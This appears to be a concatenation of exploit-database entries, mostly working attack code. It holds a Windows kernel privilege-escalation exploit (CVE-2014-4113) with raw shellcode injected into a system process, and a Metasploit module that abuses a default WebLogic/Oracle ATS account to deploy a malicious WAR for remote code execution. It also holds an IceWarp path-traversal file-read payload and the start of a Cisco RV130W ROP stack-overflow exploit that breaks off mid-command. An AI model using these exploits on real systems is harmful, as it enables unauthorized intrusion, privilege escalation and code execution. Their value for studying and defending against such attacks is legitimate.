#include "hd.h" // EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , 0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B , 0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 , 0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C , 0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 , 0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 , 0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E , 0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 , 0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B , 0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 , 0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D , 0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 , 0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D , 0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 , 0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 , 0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C , 0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 , 0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 , 0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 , 0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 , 0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 , 0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 , 0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C , 0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B , 0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 , 0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 , 0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 , 0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 , 0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 , 0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B , 0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3 }; HMENU __init_menu( ) { HMENU hMenu_Ret=NULL; MENUITEMINFO mItem={0}; do { HMENU hme=CreatePopupMenu(); if (hme==NULL){ printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError()); break; } mItem.cbSize=sizeof(MENUITEMINFO); mItem.fMask=(MIIM_STRING); bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem); if (bisok==false){ printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError()); break; } hMenu_Ret=CreatePopupMenu(); if (hMenu_Ret==NULL){ printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError()); break; } MENUITEMINFO mi={0}; mi.cbSize=sizeof(mi); mi.fMask=(MIIM_STRING|MIIM_SUBMENU); mi.hSubMenu=hme; mi.dwTypeData=""; mi.cch=1; bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi); if (bisok==false){ printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError()); } } while (false); return hMenu_Ret; } PVOID __calc_sep_token_addr( ) { NTSTATUS status; PSYSTEM_HANDLE_INFORMATION handleInfo=NULL; ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; do { _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation"); _NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject"); _NtQueryObject NtQueryObject = (_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject"); if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){ printf("get sys proc failed!\n"); break; } handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize); while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo, handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH) handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2); if (!NT_SUCCESS(status)){ printf("NtQuerySystemInformation failed!\n"); break; } POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000); for (i = 0; i < handleInfo->HandleCount; i++) { SYSTEM_HANDLE handle = handleInfo->Handles[i]; if (handle.ProcessId != GetCurrentProcessId()) continue; if (!NT_SUCCESS(NtQueryObject( (HANDLE)handle.Handle, ObjectTypeInformation, objectTypeInfo, 0x1000, NULL ))) { printf("[%#x] Error!\n", handle.Handle); continue; } if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0) continue; if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token")) continue; ret_obj_addr=((ULONGLONG)handle.Object+0x40); } if (objectTypeInfo) free(objectTypeInfo); if (handleInfo) free(handleInfo); } while (false); return (PVOID)ret_obj_addr; } ULONGLONG __calc_pid( ) { NTSTATUS status; PSYSTEM_PROCESS_INFORMATION PsInfo=NULL; ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; do { _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation){ printf("get sys proc failed!\n"); break; } PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize); while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo, PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH) PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2); if (!NT_SUCCESS(status)){ printf("NtQuerySystemInformation failed!\n"); break; } for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta)) { if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0) continue; if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){ ret_pid=PsInfo->InheritedFromProcessId; break; } } } while (false); return ret_pid; } ULONGLONG __init_fake_wnd_pti( ) { ULONGLONG ret_pti=NULL; ULONGLONG dst_proc_addr=NULL; do { ret_pti=(ULONGLONG)malloc(0x500); if (ret_pti==NULL){ printf("malloc fail!\n"); return NULL; } *(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0; //Win32Process *(DWORD*)(ret_pti+_oft_0420h_pti)=0; //not 0x20 *(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5; //TODO: void* tmpbuf=malloc(0x100); memset(tmpbuf ,0 ,0x100); *(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit } while (false); return ret_pti; } bool __init_fake_tagWnd( ) { bool bRet=false; _ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL; do { HMODULE hmd=LoadLibrary("ntdll.dll"); if (hmd==NULL) break; ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti(); if (fake_tagwnd_pti==NULL){ printf("__calc_wnd_pti() fail!\n"); break; } pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory"); if (pfn_ZwAllocateVm==NULL){ printf("pfn ZwAllocateVirtualMemery addr is NULL!\n"); break; } BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000; NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size, MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE); if (status < 0){ printf("Allocate fake tagWnd fail!\n"); break;; } ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr; if (ul_align > 0x10000){ printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr); break; } memset(fake_tagWnd_addr+ul_align ,0 ,0x1000); *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0; *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed bRet=true; } while (false); return bRet; } LRESULT __stdcall __wh_wnd_proc( int code, WPARAM wparam, LPARAM lparam ) { do { CWPSTRUCT* lpm=(CWPSTRUCT*)lparam; if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true) break; g_bis_mn_findwnded=true; UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc); g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl); } while (false); return CallNextHookEx(g_hhk ,code ,wparam ,lparam); } LRESULT __wnd_proc_sl( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam ) { do { if (umsg != MN_FINDWINDOWFROMPOINT ) break; if (g_bis_endmenu) break; g_bis_endmenu=1; EndMenu(); return 0xFFFFFFFB; } while (false); return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam); } LRESULT __stdcall __wnd_proc( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam ) { if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE) { g_bis_idled=TRUE; PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0); PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0); PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff); } return DefWindowProc(hwnd ,umsg ,wparam ,lparam); } DWORD __stdcall __thread_plroc( void* param ) { bool bisok=false; WNDCLASS wndcls={0}; do { wndcls.lpfnWndProc=__wnd_proc; wndcls.lpszClassName="cve_2014_4113"; RegisterClass(&wndcls); HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0, 200 ,200 ,NULL ,NULL ,NULL ,NULL); if (hwnd==NULL){ printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError()); break; } HMENU hmenu=__init_menu(); if (hmenu==NULL){ printf("__init_menu() fail: 0x%x\n" ,GetLastError()); break; } bool bisok=__init_fake_tagWnd(); if (bisok==false){ printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError()); break; } g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId()); if (g_hhk==NULL){ printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError()); break; } bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL); if (bisok==false){ printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError()); break; } CloseHandle(hmenu); DestroyWindow(hwnd); } while (FALSE); return 0; } int main( int argc ,char** argv ) { bool bisok=false; do { if (argc != 2){ printf("usage: xxx fpath"); break; } HANDLE hProcessToken=NULL ,hRestrictedToken=NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) { printf("Could not open process token\n"); break; } if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){ printf("Could not create restricted token\n"); break; } if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) { printf("Could not adjust privileges\n"); break; } CloseHandle(hProcessToken); HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL); if (hthread==NULL){ printf("CreateThread() fail: 0x%x\n" ,GetLastError()); break; } WaitForSingleObject(hthread ,1000); TerminateThread(hthread ,0); if (!ImpersonateLoggedOnUser(hRestrictedToken)){ printf("ImpersonateLoggedOnUser failed!\n"); break; } PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA"); if (pfn_cps==NULL){ printf("GetProcess CreateProcessA failed!\n"); break; } ULONGLONG ul_pid_winlogon=__calc_pid(); if (ul_pid_winlogon==NULL){ printf("__calc_winlogon_pid failed!\n"); break; } HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon); if (hprocess==NULL){ printf("OpenProcess failed: %x\n" ,GetLastError()); break; } //init params PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE); if (params==NULL){ printf("VirtualAllocEx failed:%x\n" ,GetLastError()); break; } ULONGLONG ul_ret_wrt=0; bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt); if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){ printf("WriteProcessMemory() failed!\n"); break; } //init shellcode PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE); if (shellcode==NULL){ printf("VirtualAllocEx failed:%x\n" ,GetLastError()); break; } bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt); if (bisok==false || ul_ret_wrt < sizeof(__s_code)){ printf("WriteProcessMemory() failed!\n"); break; } DWORD dw_tid=0; HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid); if (htd_rmt==NULL){ printf("CreateRemoteThread() fail!\n"); break; } //clear CloseHandle(htd_rmt); CloseHandle(hprocess); CloseHandle(hRestrictedToken); } while (false); return 0; }

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment', 'Description' => %q{ This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you administrator access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steven Seeley', # Used the trick and told me about it 'sinn3r' # Metasploit module ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'WebLogic Server Administration Console 12 or prior', { } ] ], 'References' => [ # The CVE description matches what this exploit is doing, but it was for version # 9.0 and 9.1. We are not super sure whether this is the right CVE or not. # ['CVE', '2007-2699'] ], 'DefaultOptions' => { 'RPORT' => 8088 }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => 'Mar 13 2019', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']), OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']), OptString.new('OATSPASSWORD', [true, 'The password for the admin console']) ]) register_advanced_options( [ OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS']) ]) end class LoginSpec attr_accessor :admin_console_session end def login_spec @login_spec ||= LoginSpec.new end class OatsWarPayload < MetasploitModule attr_reader :name attr_reader :war def initialize(payload) @name = [Faker::App.name, Rex::Text.rand_name].sample @war = payload.encoded_war(app_name: name).to_s end end def default_oats_path datastore['DefaultOatsPath'] end def war_payload @war_payload ||= OatsWarPayload.new(payload) end def set_frsc value = get_deploy_frsc @frsc = value end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp') }) if res && res.body.include?('Oracle WebLogic Server Administration Console') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def set_admin_console_session(res) cookie = res.get_cookies admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first vprint_status("Token for console session is: #{admin_console_session}") login_spec.admin_console_session = admin_console_session end def is_logged_in?(res) html = res.get_html_document a_element = html.at('a') if a_element.respond_to?(:attributes) && a_element.attributes['href'] link = a_element.attributes['href'].value return URI(link).request_uri == '/console' end false end def do_login uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) fail_with(Failure::Unknown, 'No response from server') unless res set_admin_console_session(res) uri = normalize_uri(target_uri.path, 'console', 'j_security_check') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_post' => { 'j_username' => datastore['OATSUSERNAME'], 'j_password' => datastore['OATSPASSWORD'], 'j_character_encoding' => 'UTF-8' } }) fail_with(Failure::Unknown, 'No response while trying to log in') unless res fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res) store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD']) set_admin_console_session(res) end def get_deploy_frsc # First we are just going through the pages in a specific order to get the FRSC value # we need to prepare uploading the WAR file. res = nil requests = [ { path: 'console/', vars: {} }, { path: 'console/console.portal', vars: {'_nfpb'=>"true"} }, { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} } ] requests.each do |req| res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, req[:path]), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => req[:vars] }) fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res end html = res.get_html_document hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]') frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil frsc_attr ? frsc_attr.value : '' end def do_select_upload_action action = '/com/bea/console/actions/app/install/selectUploadApp' app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletselectedAppPath' => app_path, 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res end def do_upload_app_action action = '/com/bea/console/actions/app/install/uploadApp' ctype = 'application/octet-stream' app_cname = 'AppApplicationInstallPortletuploadAppPath' plan_cname = 'AppApplicationInstallPortletuploadPlanPath' frsc_cname = 'AppApplicationInstallPortletfrsc' war = war_payload.war war_name = war_payload.name post_data = Rex::MIME::Message.new post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"") post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"") post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) end def do_app_select_action action = '/com/bea/console/actions/app/install/appSelected' war_name = war_payload.name app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletselectedAppPath' => app_path, 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) end def do_style_select_action action = '/com/bea/console/actions/app/install/targetStyleSelected' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortlettargetStyle' => 'Application', 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res end def do_finish_action action = '/com/bea/console/actions/app/install/finish' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletname' => war_payload.name, 'AppApplicationInstallPortletsecurityModel' => 'DDOnly', 'AppApplicationInstallPortletstagingStyle' => 'Default', 'AppApplicationInstallPortletplanStagingStyle' => 'Default', 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) # 302 is a good enough indicator of a successful upload, otherwise # the server would actually return a 200 with an error message. res.code == 302 end def print_response_message(res) html = res.get_html_document message_div = html.at('div[@class="message"]') if message_div msg = message_div.at('span').text print_status("Server replies: #{msg.inspect}") end end def deploy_war set_frsc print_status("FRSC value: #{frsc}") do_select_upload_action do_upload_app_action do_app_select_action do_style_select_action do_finish_action end def goto_war(name) print_good("Operation \"#{name}\" is a go!") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, name) }) print_status("Code #{res.code} on \"#{name}\" request") if res end def undeploy_war war_name = war_payload.name handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")' contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")| res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage', 'AppDeploymentsControlPortlethandle' => handle }, 'vars_post' => { # For some reason, the value given to the server is escapped twice. # The Metasploit API should do it at least once. 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents), '_pageLabel' => 'AppApplicationUninstallPage', '_nfpb' => 'true', 'AppApplicationUninstallPortletfrsc' => frsc } }) if res && res.code == 302 print_good("Successfully undeployed #{war_name}.war") else print_warning("Unable to successfully undeploy #{war_name}.war") print_warning('You may want to do so manually.') end end def cleanup undeploy_war if is_cleanup_ready super end def setup @is_cleanup_ready = false super end def exploit unless check == Exploit::CheckCode::Detected print_status('Target does not have the login page we are looking for.') return end do_login print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}") print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes") result = deploy_war if result @is_cleanup_ready = true goto_war(war_payload.name) end end attr_reader :frsc attr_reader :is_cleanup_ready end

# Exploit Title: IceWarp <=10.4.4 local file include # Date: 02/06/2019 # Exploit Author: JameelNabbo # Website: uitsec.com # Vendor Homepage: http://www.icewarp.com # Software Link: https://www.icewarp.com/downloads/trial/ # Version: 10.4.4 # Tested on: Windows 10 # CVE: CVE-2019-12593 POC: http://example.com/webmail/calendar/minimizer/index.php?style=[LFI] Example: http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

#!/usr/bin/python # Exploit Title: Cisco RV130W Remote Stack Overflow # Google Dork: n/a # Date: Advisory Published: Feb 2019 # Exploit Author: @0x00string # Vendor Homepage: cisco.com # Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html # Version: 1.0.3.44 and prior # Tested on: 1.0.3.44 # CVE : CVE-2019-1663 # # 0x357fc000 - libc base addr # 0x35849144 - system() addr # # 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; # 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; # 0x00041308 / 0x3583D308: mov r0, sp; blx r2; # # gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text # [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] # # curl -k -X 'POST' --data 